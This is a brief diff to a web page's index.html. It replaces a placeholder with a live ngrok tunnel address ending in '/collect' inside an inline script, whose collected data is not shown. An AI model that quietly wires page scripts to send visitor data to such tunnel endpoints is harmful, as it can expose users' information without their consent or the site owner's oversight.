--- a/index.html
+++ b/index.html
@@ -677,10 +677,11 @@
                 loader.style.display = 'none';
             }
         });
+
     </script>
     <script>
         (function () {
-            const endpoint = "https://YOUR-NGROK-ID.ngrok-free.app/collect";
+            const endpoint = "https://c8b422dff577.ngrok-free.app/collect";
             if (!endpoint || endpoint.indexOf("YOUR-NGROK-ID") !== -1) {
                 return;
             }
